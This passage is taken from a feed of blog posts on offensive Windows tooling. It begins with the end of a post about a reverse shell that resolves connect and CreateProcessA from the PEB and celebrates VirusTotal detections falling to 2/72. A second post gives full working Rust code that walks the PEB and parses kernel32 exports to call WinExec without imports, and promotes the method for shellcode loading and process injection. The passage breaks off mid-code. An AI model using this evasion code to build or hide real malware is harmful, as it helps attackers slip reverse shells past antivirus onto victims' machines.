↓ inet_pton (resolved from PEB) ↓ connect (resolved from PEB) ↓ GetSystemDirectoryA (resolved from PEB) ↓ Initialize STARTUPINFOA ↓ Set lpCommandLine ↓ Initialize SECURITY_ATTRIBUTES ↓ CreateProcessA (resolved from PEB) ↓ Finish </code></pre> </div> <ul> <li>All API addresses were resolved manually by parsing the export tables of <code>kernel32.dll</code> and <code>Ws2_32.dll</code>, accessed through the PEB.</li> <li>No functions were declared in the import table, making the binary significantly harder to analyze via static disassembly or automated AV heuristics.</li> </ul> <p>The resulting binary was again uploaded to VirusTotal. This time, the detection score dropped drastically to 2/72, with only Google and IKARUS flagging the file as suspicious. This demonstrates a significant improvement in stealthiness — achieved purely through API obfuscation and avoiding direct imports.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fta3wjoxubd53gdu2w41t.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fta3wjoxubd53gdu2w41t.png" alt=" " width="800" height="350"></a></p> <p>Today, I obtained a new VirusTotal scan result — this time, the detection score dropped to 11 out of 66.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6nlb9o7j99psswhupby.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6nlb9o7j99psswhupby.png" alt=" " width="800" height="394"></a> </p> rust peb reverseshell security Traverse the Process Environment Block (PEB) in Rust windasunnie Fri, 02 May 2025 10:05:27 +0000 https://forem.com/windasunnie/traverse-the-process-environment-block-peb-in-rust-498b https://forem.com/windasunnie/traverse-the-process-environment-block-peb-in-rust-498b <p>A few days ago, we demonstrated how to call <code>calc.exe</code> by walking the PEB manually. But why isn't assembly code more widely used in the wild, especially in offensive tooling?</p> <p>Assembly has several major drawbacks:</p> <ul> <li>Easy to write, <strong>hard to read</strong> </li> <li> <strong>Hard to maintain</strong> (an actual nightmare)</li> <li><strong>Difficult to compose or reuse</strong></li> <li><strong>Painful to debug</strong></li> </ul> <p>In short, it’s only “good” for writing once—and then you hope you never have to read it again.</p> <h2> Why Rust? </h2> <p>Rust offers powerful memory safety guarantees while still allowing low-level control. It’s a great fit for scenarios like shellcode loading, manual API resolution, and process injection—situations where C or C++ might traditionally be used.</p> <p>Sounds promising? Let’s give it a shot!</p> <blockquote> <p>⚠️ <strong>Warning</strong>: This requires manually defining C-style structures such as <code>PEB</code>, <code>PEB_LDR_DATA</code>, <code>LDR_DATA_TABLE_ENTRY</code>, <code>IMAGE_DOS_HEADER</code>, and <code>IMAGE_NT_HEADERS</code>, and heavy use of <code>unsafe</code> blocks.</p> </blockquote> <h2> Overview: Manual API Resolution via the PEB </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Process NtCurrentTeb() -&gt; PEB → PEB_LDR_DATA → InMemoryOrderModuleList → Find kernel32.dll → Parse PE header → Export Directory → Find AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions → Match function name, resolve VA from RVA </code></pre> </div> <h2> Step-by-Step Walkthrough </h2> <h3> Walking the PEB </h3> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">fn</span> <span class="nf">get_peb</span><span class="p">()</span> <span class="k">-&gt;</span><span class="o">*</span><span class="k">mut</span> <span class="n">PEB</span> <span class="p">{</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">peb</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PEB</span><span class="p">;</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nd">asm!</span><span class="p">(</span> <span class="s">"mov {peb}, gs:[0x60]"</span><span class="p">,</span> <span class="n">peb</span> <span class="o">=</span> <span class="nf">out</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">peb</span><span class="p">,</span> <span class="p">);</span> <span class="p">}</span> <span class="n">peb</span> <span class="p">}</span> </code></pre> </div> <h3> Accessing PEB_LDR_DATA </h3> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="n">peb</span> <span class="o">=</span> <span class="nf">get_peb</span><span class="p">();</span> <span class="k">if</span> <span class="n">peb</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">None</span><span class="p">;</span> <span class="p">}</span> <span class="k">let</span> <span class="n">ldr</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">peb</span><span class="p">)</span><span class="py">.loader_data</span><span class="p">;</span> <span class="k">if</span> <span class="n">ldr</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">None</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> Walking InMemoryOrderModuleList to Find kernel32.dll </h3> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="n">list</span> <span class="o">=</span> <span class="o">&amp;</span><span class="p">(</span><span class="o">*</span><span class="n">ldr</span><span class="p">)</span><span class="py">.in_memory_order_module_list</span><span class="p">;</span> <span class="k">let</span> <span class="n">list_head</span> <span class="o">=</span> <span class="n">list</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">_</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">;</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">link</span> <span class="o">=</span> <span class="n">list</span><span class="py">.flink</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="n">link</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span> <span class="o">!=</span> <span class="n">list_head</span> <span class="p">{</span> <span class="k">let</span> <span class="n">entry</span> <span class="o">=</span> <span class="p">(</span><span class="n">link</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">-</span> <span class="nd">offset_of!</span><span class="p">(</span><span class="n">LoaderDataTableEntry</span><span class="p">,</span> <span class="n">in_memory_order_links</span><span class="p">))</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LoaderDataTableEntry</span><span class="p">;</span> <span class="k">if</span> <span class="n">entry</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="k">let</span> <span class="n">base</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">entry</span><span class="p">)</span><span class="py">.dll_base</span><span class="p">;</span> <span class="k">let</span> <span class="n">name</span> <span class="o">=</span> <span class="o">&amp;</span><span class="p">(</span><span class="o">*</span><span class="n">entry</span><span class="p">)</span><span class="py">.base_dll_name</span><span class="p">;</span> <span class="k">let</span> <span class="n">name_slice</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">slice</span><span class="p">::</span><span class="nf">from_raw_parts</span><span class="p">(</span><span class="n">name</span><span class="py">.buffer</span><span class="p">,</span> <span class="p">(</span><span class="n">name</span><span class="py">.length</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">);</span> <span class="k">let</span> <span class="n">name_str</span> <span class="o">=</span> <span class="nn">String</span><span class="p">::</span><span class="nf">from_utf16_lossy</span><span class="p">(</span><span class="n">name_slice</span><span class="p">);</span> <span class="k">if</span> <span class="n">name_str</span><span class="nf">.to_lowercase</span><span class="p">()</span><span class="nf">.contains</span><span class="p">(</span><span class="s">"kernel32.dll"</span><span class="p">)</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"[+] kernel32.dll base: {:p}"</span><span class="p">,</span> <span class="n">base</span><span class="p">);</span> <span class="k">return</span> <span class="nf">Some</span><span class="p">(</span><span class="n">base</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">);</span> <span class="p">}</span> <span class="n">link</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">link</span><span class="p">)</span><span class="py">.flink</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h2> Parsing the Export Table </h2> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">get_export_directory</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageExportDirectory</span> <span class="p">{</span> <span class="k">let</span> <span class="n">dos_header</span> <span class="o">=</span> <span class="n">kernel32_base</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageDosHeader</span><span class="p">;</span> <span class="k">let</span> <span class="n">nt_header</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.add</span><span class="p">((</span><span class="o">*</span><span class="n">dos_header</span><span class="p">)</span><span class="py">.e_lfanew</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageNtHeaders</span><span class="p">;</span> <span class="k">let</span> <span class="n">export_directory_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">nt_header</span><span class="p">)</span><span class="py">.optional_header.data_directory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_EXPORT</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">]</span><span class="py">.virtual_address</span><span class="p">;</span> <span class="n">kernel32_base</span><span class="nf">.add</span><span class="p">(</span><span class="n">export_directory_rva</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageExportDirectory</span> <span class="p">}</span> </code></pre> </div> <h2> Finding WinExec </h2> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">find_function</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">function_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span> <span class="p">{</span> <span class="k">let</span> <span class="n">export_directory</span> <span class="o">=</span> <span class="nf">get_export_directory</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">);</span> <span class="k">let</span> <span class="n">name_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.address_of_names</span><span class="p">;</span> <span class="k">let</span> <span class="n">names</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">name_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u32</span><span class="p">;</span> <span class="k">let</span> <span class="n">ordinals_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.address_of_name_ordinals</span><span class="p">;</span> <span class="k">let</span> <span class="n">ordinals</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">ordinals_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u16</span><span class="p">;</span> <span class="k">let</span> <span class="n">function_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.address_of_functions</span><span class="p">;</span> <span class="k">let</span> <span class="n">functions</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">function_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u32</span><span class="p">;</span> <span class="k">for</span> <span class="n">i</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.number_of_names</span> <span class="p">{</span> <span class="k">let</span> <span class="n">name_rva</span> <span class="o">=</span> <span class="o">*</span><span class="n">names</span><span class="nf">.offset</span><span class="p">(</span><span class="n">i</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="k">let</span> <span class="n">name_ptr</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">name_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">i8</span><span class="p">;</span> <span class="k">let</span> <span class="n">name</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nn">CStr</span><span class="p">::</span><span class="nf">from_ptr</span><span class="p">(</span><span class="n">name_ptr</span><span class="p">)</span><span class="nf">.to_str</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">();</span> <span class="k">if</span> <span class="n">name</span> <span class="o">==</span> <span class="n">function_name</span> <span class="p">{</span> <span class="k">let</span> <span class="n">ordinal</span> <span class="o">=</span> <span class="o">*</span><span class="n">ordinals</span><span class="nf">.offset</span><span class="p">(</span><span class="n">i</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="k">let</span> <span class="n">func_rva</span> <span class="o">=</span> <span class="o">*</span><span class="n">functions</span><span class="nf">.offset</span><span class="p">(</span><span class="n">ordinal</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="k">return</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">func_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">null_mut</span><span class="p">()</span> <span class="p">}</span> <span class="k">let</span> <span class="n">winexec_addr</span> <span class="o">=</span> <span class="nf">find_function</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">,</span> <span class="s">"WinExec"</span><span class="p">);</span> </code></pre> </div> <h2> Full Code Example </h2> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="nd">#![feature(asm)]</span> <span class="nd">#[warn(unused_imports)]</span> <span class="nd">#[warn(unsafe_op_in_unsafe_fn)]</span> <span class="k">use</span> <span class="nn">core</span><span class="p">::</span><span class="nn">arch</span><span class="p">::</span><span class="n">asm</span><span class="p">;</span> <span class="k">use</span> <span class="nn">std</span><span class="p">::{</span><span class="nn">ffi</span><span class="p">::{</span><span class="nb">c_void</span><span class="p">,</span> <span class="n">CString</span><span class="p">},</span> <span class="nn">mem</span><span class="p">::</span><span class="n">transmute</span><span class="p">,</span> <span class="nn">ptr</span><span class="p">::</span><span class="n">null_mut</span><span class="p">};</span> <span class="k">use</span> <span class="nn">memoffset</span><span class="p">::</span><span class="n">offset_of</span><span class="p">;</span> <span class="k">mod</span> <span class="n">utils</span><span class="p">;</span> <span class="k">use</span> <span class="nn">utils</span><span class="p">::{</span><span class="n">PEB</span><span class="p">,</span> <span class="n">LoaderDataTableEntry</span><span class="p">,</span> <span class="n">ImageExportDirectory</span><span class="p">,</span> <span class="n">ImageDosHeader</span><span class="p">,</span> <span class="n">ImageNtHeaders</span><span class="p">};</span> <span class="k">const</span> <span class="n">IMAGE_DIRECTORY_ENTRY_EXPORT</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">fn</span> <span class="nf">get_peb</span><span class="p">()</span> <span class="k">-&gt;</span><span class="o">*</span><span class="k">mut</span> <span class="n">PEB</span> <span class="p">{</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">peb</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PEB</span><span class="p">;</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nd">asm!</span><span class="p">(</span> <span class="s">"mov {peb}, gs:[0x60]"</span><span class="p">,</span> <span class="n">peb</span> <span class="o">=</span> <span class="nf">out</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">peb</span><span class="p">,</span> <span class="p">);</span> <span class="p">}</span> <span class="n">peb</span> <span class="p">}</span> <span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">find_kernel32_base</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Option</span><span class="o">&lt;*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="o">&gt;</span><span class="p">{</span> <span class="k">let</span> <span class="n">peb</span> <span class="o">=</span> <span class="nf">get_peb</span><span class="p">();</span> <span class="k">if</span> <span class="n">peb</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">None</span><span class="p">;</span> <span class="p">}</span> <span class="k">let</span> <span class="n">ldr</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">peb</span><span class="p">)</span><span class="py">.loader_data</span><span class="p">;</span> <span class="k">if</span> <span class="n">ldr</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">None</span><span class="p">;</span> <span class="p">}</span> <span class="k">let</span> <span class="n">list</span> <span class="o">=</span> <span class="o">&amp;</span><span class="p">(</span><span class="o">*</span><span class="n">ldr</span><span class="p">)</span><span class="py">.in_memory_order_module_list</span><span class="p">;</span> <span class="k">let</span> <span class="n">list_head</span> <span class="o">=</span> <span class="n">list</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">_</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">;</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">link</span> <span class="o">=</span> <span class="n">list</span><span class="py">.flink</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="n">link</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span> <span class="o">!=</span> <span class="n">list_head</span> <span class="p">{</span> <span class="k">let</span> <span class="n">entry</span> <span class="o">=</span> <span class="p">(</span><span class="n">link</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">-</span> <span class="nd">offset_of!</span><span class="p">(</span><span class="n">LoaderDataTableEntry</span><span class="p">,</span> <span class="n">in_memory_order_links</span><span class="p">))</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LoaderDataTableEntry</span><span class="p">;</span> <span class="k">if</span> <span class="n">entry</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="k">let</span> <span class="n">base</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">entry</span><span class="p">)</span><span class="py">.dll_base</span><span class="p">;</span> <span class="k">let</span> <span class="n">name</span> <span class="o">=</span> <span class="o">&amp;</span><span class="p">(</span><span class="o">*</span><span class="n">entry</span><span class="p">)</span><span class="py">.base_dll_name</span><span class="p">;</span> <span class="k">let</span> <span class="n">name_slice</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">slice</span><span class="p">::</span><span class="nf">from_raw_parts</span><span class="p">(</span><span class="n">name</span><span class="py">.buffer</span><span class="p">,</span> <span class="p">(</span><span class="n">name</span><span class="py">.length</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">);</span> <span class="k">let</span> <span class="n">name_str</span> <span class="o">=</span> <span class="nn">String</span><span class="p">::</span><span class="nf">from_utf16_lossy</span><span class="p">(</span><span class="n">name_slice</span><span class="p">);</span> <span class="k">if</span> <span class="n">name_str</span><span class="nf">.to_lowercase</span><span class="p">()</span><span class="nf">.contains</span><span class="p">(</span><span class="s">"kernel32.dll"</span><span class="p">)</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"[+] kernel32.dll base: {:p}"</span><span class="p">,</span> <span class="n">base</span><span class="p">);</span> <span class="k">return</span> <span class="nf">Some</span><span class="p">(</span><span class="n">base</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">);</span> <span class="p">}</span> <span class="n">link</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">link</span><span class="p">)</span><span class="py">.flink</span><span class="p">;</span> <span class="p">}</span> <span class="nb">None</span> <span class="p">}</span> <span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">get_export_directory</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageExportDirectory</span> <span class="p">{</span> <span class="k">let</span> <span class="n">dos_header</span> <span class="o">=</span> <span class="n">kernel32_base</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageDosHeader</span><span class="p">;</span> <span class="k">let</span> <span class="n">nt_header</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.add</span><span class="p">((</span><span class="o">*</span><span class="n">dos_header</span><span class="p">)</span><span class="py">.e_lfanew</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageNtHeaders</span><span class="p">;</span> <span class="k">let</span> <span class="n">export_directory_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">nt_header</span><span class="p">)</span><span class="py">.optional_header.data_directory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_EXPORT</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">]</span><span class="py">.virtual_address</span><span class="p">;</span> <span class="n">kernel32_base</span><span class="nf">.add</span><span class="p">(</span><span class="n">export_directory_rva</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">ImageExportDirectory</span> <span class="p">}</span> <span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">find_function</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">function_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span> <span class="p">{</span> <span class="k">let</span> <span class="n">export_directory</span> <span class="o">=</span> <span class="nf">get_export_directory</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">);</span> <span class="k">let</span> <span class="n">name_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.address_of_names</span><span class="p">;</span> <span class="k">let</span> <span class="n">names</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">name_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u32</span><span class="p">;</span> <span class="k">let</span> <span class="n">ordinals_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.address_of_name_ordinals</span><span class="p">;</span> <span class="k">let</span> <span class="n">ordinals</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">ordinals_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u16</span><span class="p">;</span> <span class="k">let</span> <span class="n">function_rva</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.address_of_functions</span><span class="p">;</span> <span class="k">let</span> <span class="n">functions</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">function_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u32</span><span class="p">;</span> <span class="k">for</span> <span class="n">i</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="p">(</span><span class="o">*</span><span class="n">export_directory</span><span class="p">)</span><span class="py">.number_of_names</span> <span class="p">{</span> <span class="k">let</span> <span class="n">name_rva</span> <span class="o">=</span> <span class="o">*</span><span class="n">names</span><span class="nf">.offset</span><span class="p">(</span><span class="n">i</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="k">let</span> <span class="n">name_ptr</span> <span class="o">=</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">name_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">i8</span><span class="p">;</span> <span class="k">let</span> <span class="n">name</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nn">CStr</span><span class="p">::</span><span class="nf">from_ptr</span><span class="p">(</span><span class="n">name_ptr</span><span class="p">)</span><span class="nf">.to_str</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">();</span> <span class="k">if</span> <span class="n">name</span> <span class="o">==</span> <span class="n">function_name</span> <span class="p">{</span> <span class="k">let</span> <span class="n">ordinal</span> <span class="o">=</span> <span class="o">*</span><span class="n">ordinals</span><span class="nf">.offset</span><span class="p">(</span><span class="n">i</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="k">let</span> <span class="n">func_rva</span> <span class="o">=</span> <span class="o">*</span><span class="n">functions</span><span class="nf">.offset</span><span class="p">(</span><span class="n">ordinal</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="k">return</span> <span class="n">kernel32_base</span><span class="nf">.offset</span><span class="p">(</span><span class="n">func_rva</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">null_mut</span><span class="p">()</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">let</span> <span class="n">kernel32_base</span> <span class="o">=</span> <span class="k">match</span> <span class="nf">find_kernel32_base</span><span class="p">()</span> <span class="p">{</span> <span class="nf">Some</span><span class="p">(</span><span class="n">ptr</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Found kernel32.dll base at {:p}"</span><span class="p">,</span> <span class="n">ptr</span><span class="p">);</span> <span class="n">ptr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span> <span class="p">}</span> <span class="nb">None</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"kernel32.dll not found"</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="p">};</span> <span class="c1">// Find WinExec from export table</span> <span class="k">let</span> <span class="n">get_proc_address</span> <span class="o">=</span> <span class="nf">find_function</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">,</span> <span class="s">"GetProcAddress"</span><span class="p">);</span> <span class="k">let</span> <span class="n">load_library_a</span> <span class="o">=</span> <span class="nf">find_function</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">,</span> <span class="s">"LoadLibraryA"</span><span class="p">);</span> <span class="k">let</span> <span class="n">winexec_addr</span> <span class="o">=</span> <span class="nf">find_function</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">,</span> <span class="s">"WinExec"</span><span class="p">);</span> <span class="k">let</span> <span class="n">exitprocess_addr</span> <span class="o">=</span> <span class="nf">find_function</span><span class="p">(</span><span class="n">kernel32_base</span><span class="p">,</span> <span class="s">"ExitProcess"</span><span class="p">);</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"GetProcAddress address: {:p}"</span><span class="p">,</span> <span class="n">get_proc_address</span><span class="p">);</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"LoadLibraryA address: {:p}"</span><span class="p">,</span> <span class="n">load_library_a</span><span class="p">);</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"WinExec address: {:p}"</span><span class="p">,</span> <span class="n">winexec_addr</span><span class="p">);</span> <span class="k">let</span> <span class="n">winexec</span><span class="p">:</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="o">*</span><span class="k">const</span> <span class="nb">i8</span><span class="p">,</span> <span class="nb">u32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u32</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="n">winexec_addr</span><span class="p">);</span> <span class="k">let</span> <span class="n">exitprocess</span><span class="p">:</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="nb">u32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="o">!</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="n">exitprocess_addr</span><span class="p">);</span> <span class="k">let</span> <span class="n">calc_string</span> <span class="o">=</span> <span class="nn">CString</span><span class="p">::</span><span 